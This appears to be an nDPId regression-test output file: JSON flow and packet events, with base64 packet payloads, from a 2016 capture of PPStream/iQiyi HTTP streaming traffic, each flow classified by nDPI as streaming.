-00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1008,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1467353139866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139866,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5KWZAADMGENDKbA7swKhzCABQxSeRl6ZqgeuX\/1AYACHEyQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
-00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7440000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"thread_ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1467353140628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1100,"pkt_l4_len":1066,"thread_ts_msec":1467353140628,"pkt":"TF4M6gNlABxCjnAxCABFAAQ+A+YAAIAGJdrAqHMIymwO3cUqAFDSWIZQbAIVvVAYKACmwAAAR0VUIC9iP2MxPTYmczE9MSZtYWNpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZjaGFubmVsaWQ9MDAwJm51PSZlPTEzNTI1Mjgmc2U9MTI1MzgxMSZyPTUwMDQ5NDYwMCZhZHVpZD1kMDdkZmQzMGYwZWU0ZTQ4YmJjYWYxMjA4Yzc1ODQ3MSZjdG09MTM3NTIxMSZwbGF5c291cmNlPTAwMTAwNDAwMCZ2aWQ9NTYyZTI2Y2FlZDU2OTU5MDAyMTJlYjMyNTkwNzBmOGEmYWxidW1pZD01MDA0OTQ2MDAmcmE9MiZ0ZD0yMjY1MiZzdWNjZXNzaW9uPTQmdHlwZT0xJnZmcm09My0wMDEwMDQwMDAtY19jb3JnaS0wJmJ1Y2tldD1jX2NvcmdpX21haW4mcmF0cD0xJnBsYXltb2RlPTEmaHU9LTEmaHQ9MCZhcD0wJnQ9MjAxJmN0PWNsdF9fcGxfcGxheSZ2ZT0xMzUyNTI4JnBmPTIwMSZwPTExJnAxPTExNCZwMj0xMDExJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9JnY9Mi4wLjEwMi4zMDE0NyZkZT1hMGVlNzdhNTYzODg5N2JlYmZkODU1NWIzMjcwYmVmNiZtdj01LjIuMTUuMjI0MCZrdj0xMC4wLjAuMjkzJnNvdXJjZTE9bWluaXBsYXllciZzb3VyY2UyPW1pbmlwbGF5ZXImc291cmNlMz0lZTUlYjAlOGYlZTYlOTIlYWQlZTYlOTQlYmUlZTUlOTklYTgmc291cmNlND0lZTUlYjAlOGYlZTYlOTIlYWQlZTYlOTQlYmUmcGxheV9zb3VyY2U9MSZvcHQ9MCZjbHQ9aG9tZWRsJnNjZW5lPTEmcm49MDAwMDAwMDE0NjczNTMxNDAgSFRUU
C8xLjENCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMDsgQ0lCQTsgQWxleGEgVG9vbGJhcjsgWnVuZSA0LjcpDQpIb3N0OiBtc2cuaXFpeWkuY29tDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29va2llOiB0YnZlcj1hbHhpLTkuMzk7IGFpZD1kbWVrYzFhUEMzMDA4cA0KDQo="} -01641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7440000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"thread_ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?c1=6&s1=1&macid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&channelid=000&nu=&e=1352528&se=1253811&r=500494600&aduid=d07dfd30f0ee4e48bbcaf1208c758471&ctm=1375211&playsource=001004000&vid=562e26caed5695900212eb3259070f8a&albumid=500494600&ra=2&td=22652&succession=4&type=1&vfrm=3-001004000-c_corgi-0&bucket=c_corgi_main&ratp=1&playmode=1&hu=-1&ht=0&ap=0&t=201&ct=clt__pl_play&ve=1352528&pf=201&p=11&p1=114&p2=1011&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&v=2.0.102.30147&de=a0ee77a5638897bebfd8555b3270bef6&mv=5.2.15.2240&kv=10.0.0.293&source1=miniplayer&source2=miniplayer&source3=%e5%b0%8f%e6%92%ad%e6%94%be%e5%99%a8&source4=%e5%b0%8f%e6%92%ad%e6%94%be&play_source=1&opt=0&clt=homedl&scene=1&rn=00000001467353140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 
2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CIBA; Alexa Toolbar; Zune 4.7)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7440000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1467353140655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":941,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":941,"pkt_l4_len":907,"thread_ts_msec":1467353140655,"pkt":"TF4M6gNlABxCjnAxCABFAAOfA+lAAIAG5mbAqHMIymwO7MUrAFDgGmOz15qFMlAYQTe3tgAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjoxfDImYXY9NC4xMC4wMDQmYj0yMDQwNzY3MDEmYz02JmN0PTUwMDAwMDA5MjY3OTUmZD0xNTgmZGk9JmRwPTcxMDAwMDAxJmU9NTEyYWI3N2RlN2Y2N2Q0OWYyNGQzNTExNzc4MjIwZDAmZWM9JmVtPSZmaT0mZz0wJmw9TVRFNExqRTJNeTQ0TGprdyZtaz0mbnc9Jm9kPTUwMDAwMDA4NTYzNDQmb2k9JnA9YSZwcD0mcmM9JnJkPSZyaT0mcz0xNDY3MzUzMTM5MDU3JnNoPSZzcT0mc3c9JnQ9c3AmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NTAwNDk0NjAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm
8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} -01291{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7440000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:2:1|2&av=4.10.004&b=204076701&c=6&ct=5000000926795&d=158&di=&dp=71000001&e=512ab77de7f67d49f24d3511778220d0&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000856344&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353139057&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=500494600&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
-00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1467353140677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353140677,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0b19AADMGyurKbA7dwKhzCABQxSpsAhW90liKZlAYABAfBgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7440000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"thread_ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1467353140709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":944,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":944,"pkt_l4_len":910,"thread_ts_msec":1467353140709,"pkt":"TF4M6gNlABxCjnAxCABFAAOiA\/BAAIAG5m3AqHMIymwO28UpAFCvhj83b730NFAYAQRULwAAR0VUIC9jb3JlP3Q9MSZyZXNldD0wJnZmcm10cD0xJnRtMT0mdG0yPTAmdG0yMT0wJnRtMjI9MCZ0bTIzPTAmdG0yND0wJnRtMz0xMTcmdG0zMT0wJnRtMzI9NDcmdG0zMz03OCZ0bTM0PTEmdG00PTEzNyZ0bTQxPTAmdG00Mj0xNiZ0bTQzPTEyNSZ0bTQ0PTImdG01PTE2NSZ0bTUxPTAmdG01Mj0wJnRtNTM9MCZ0bTU0PTEwJnRtNj0mdG02Mj0wJnRtNjM9MCZ0bTc9MCZ0bTcxPTAmdG03Mj0wJnRtNzM9MCZ0bTg9MCZ0bTgxPTAmdG04Mj0wJnRtODM9MCZ0bTk9OTE2JnRtOTI9MTYmdG05Mz02MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZyYT0yJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNDAmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} 
-01470{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7440000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"thread_ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=117&tm31=0&tm32=47&tm33=78&tm34=1&tm4=137&tm41=0&tm42=16&tm43=125&tm44=2&tm5=165&tm51=0&tm52=0&tm53=0&tm54=10&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=916&tm92=16&tm93=62&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=2&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
-00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1467353140720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353140720,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5F1lAADMGIt3KbA7swKhzCABQxSvXmoUy4BpnKlAYACB7oAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7440000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1467353140755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":656,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":656,"pkt_l4_len":622,"thread_ts_msec":1467353140755,"pkt":"TF4M6gNlABxCjnAxCABFAAKCA\/NAAIAGOsjAqHMIZeMgJ8UsAFDdytkdPM+rpVAY\/\/BCUgAAR0VUIC92aS81MDA0OTQ2MDAvNTYyZTI2Y2FlZDU2OTU5MDAyMTJlYjMyNTkwNzBmOGEvP3NyYz0xXzExXzExNCBIVFRQLzEuMQ0KSG9zdDogY2FjaGUudmlkZW8uaXFpeWkuY29tDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29va2llOiBwcHNfY2xpZW50X3ZlcjI9NS4yLjE1LjIyNDA7IFQwMDQwND00ZTNhZTQxNWE1ODQ3NDhhYzlhYTMxNjI4ZjM5ZDFlODsgX3Bwc19pdmk9Vms0OU1UWXdOVEExTGFXL3BQbWhSejgvUDZUYXBFZW11RDgvcE0rd1pqOHRwTFd4M3pnd3Bsby9wR2FvY1NaV1VEMHhKbFpEUFQ4L1B6OCtwTFd4M3pnd3Bsby9wR2FvY1NaV1NqMHRNU1pXVXoxV0psWkVQU1pXVkZ0QlhUMHlNVGMxSmxaTlBTWldWajAxTGpJdU1UVXVNakkwTUNaV1ZUMW9kSFJ3T2k4dmQzZDNMbWx4YVhscExtTnZiUzkyWHpFNWNuSnNkblY0YkdjdWFIUnRiQT09OyBRQzAwNj11NTQ5dnB6MTBsOWZrYXR1bTRhbHc0YnA7IFFDMDA4PTE0NjY2NDU4MTYuMTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE7IEhtX2x2dF81M2I3Mzc0YTYzYzM3NDgzZTVkZDk3ZDc4ZDliYjM2ZT0xNDY2NjQ1ODE3OyBRQzAwNT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KDQo="} -00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7440000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": 
{"hostname":"cache.video.iqiyi.com","url":"cache.video.iqiyi.com\/vi\/500494600\/562e26caed5695900212eb3259070f8a\/?src=1_11_114","code":0,"content_type":"","user_agent":""}} -01823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1467353140794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1078,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1078,"pkt_l4_len":1044,"thread_ts_msec":1467353140794,"pkt":"ABxCjnAxTF4M6gNlCABFAAQovhBAADEGzgRl4yAnwKhzCABQxSw8z6ul3crbd1AQPSRKcgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkFjY2Vzcy1Db250cm9sLUFsbG93LUNyZWRlbnRpYWxzOiB0cnVlDQoNCmQ0OQ0KeyJjblByZW1UaW1lIjowLCJlZGl0b3JJbmZvIjoiIiwidmlkZW9RaXB1SWQiOjUwMDQ5NDYwMCwicmV3YXJkQWxsb3dlZCI6MCwibnVybCI6IiIsInN1cElkIjowLCJvbmxpbmVTdGF0dXMiOjEsImR0eXBlIjozLCJwdnUiOiIiLCJpc3N1ZVRpbWUiOjIwMTYwNjI1LCJ3cml0ZXIiOiIiLCJpc1RvcENoYXJ0IjowLCJxaXlpUGxheVN0cmF0ZWd5Ijoi5q+P5ZGo5LqU5ZGo5YWtMjA6MDAiLCJ1cCI6IjIwMTYtMDYtMjkgMTk6NDc6MDIiLCJpcExpbWl0IjowLCJ1biI6IiIsImV4Y2x1c2l2ZSI6MSwidm4iOiLjgIrkuIDmtL7mlrnoqIDjgItDLUJsb2Nr6ZW\/5rKZ6K+d44CK6ICB6KGX55qE5ZGz44CLIiwicHR1cmwiOiIiLCJzdGFydFRpbWUiOi0xLCJzdCI6MjAwLCJ0eSI6MjAxNjA2MjUsInNtIjowLCJzaG93Q2hhbm5lbElkIjo2LCJwb3Z1IjoiIiwicHJvZHVjZXJzIjoiIiwiZXRtIjoiIiwic3VwTmFtZSI6IiIsInR2RW5hbWUiOiIiLCJzYyI6MCwiY2MiOjAsIm1kb3duIjowLCJwYW5vIjp7InR5cGUiOjF9LCJtYWluQWN0b3JSb2xlcyI6W10sInN1YktleSI6IjIwNDA3NjcwMSIsImFwaWMiOiJodHRwOlwvXC9waWM1LnFpeWlwaWMuY29tXC9pbWFnZVwvMjAxNjA2MjVcL2Q3XC81OVwvdl8xMTA1ODM2NjZfbV82MDEuanBnIiwiZXMiOjEsInByb2R1Y2VyIjoiIiwiZW5kVGltZSI6LTEsImF1IjoiaHR0cDpcL1wvd3d3LmlxaXlpLmNvbVwvdl8xOXJybGpmM2hnLmh0bWwiLCJjaXJjbGUiOnsidHlwZSI6MiwiaWQiOjIwNQ=
="} -01823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1467353140794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1078,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1078,"pkt_l4_len":1044,"thread_ts_msec":1467353140794,"pkt":"ABxCjnAxTF4M6gNlCABFAAQovhFAADEGzgNl4yAnwKhzCABQxSw8z6+l3crbd1AQPSTsVQAANDczOTQ3fSwiaXNEaXNwbGF5Q2lyY2xlIjoxLCJwYXlNYXJrIjowLCJwbGMiOnsiNCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxMCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCI1Ijp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjExIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjEyIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjciOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTgiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTMiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTQiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiOCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjkiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiNiI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxNiI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxNSI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIzIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjE3Ijp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjIiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMjEiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTkiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMjAiOnsiY29hIjoxLCJkb3duQWxkIjoxfX0sIm50dmQiOjAsInR2Rm9jdXNlIjoi6ZW\/5rKZ6K+d44CK6ICB6KGX55qE5ZGz44CLIiwiY1R5cGUiOjcsInFpeWlQcm9kdWNlZCI6MSwidm90ZXMiOltdLCJhbGJ1bVFpcHVJZCI6NTAwNDk0NjAwLCJjYXRlZ29yeUtleXdvcmRzIjoi57u86Im6LDUwMDQ5NDYwMCwwLGh0dHA6XC9cL2xpc3QuaXFpeWkuY29tXC93d3dcLzZcLy0tLS0tLS0tLS0tLS0tLS0tLS5odG1sIOWGheWcsCwxNTEsMSxodHRwOlwvXC9saXN0LmlxaXlpLmNvbVwvd3d3XC82XC8xNTEtLS0tLS0tLS0tLS0tLS0tLS0uaHRtbCDlhbblroMsMTYxLDIsaHR0cDpcL1wvbGlzdC5pcWl5aS5jb21cL3d3d1wvNlwvLTE2MS0tLS0tLS0tLS0tLS0tLS0tLmh0bWwg5q2M6IieLDIxMjEsMixodHRwOlwvXC9saXN0LmlxaXlpLmNvbVwvd3d3XC82XC8tMjEyMS0tLS0tLS0tLS0tLQ=="} 
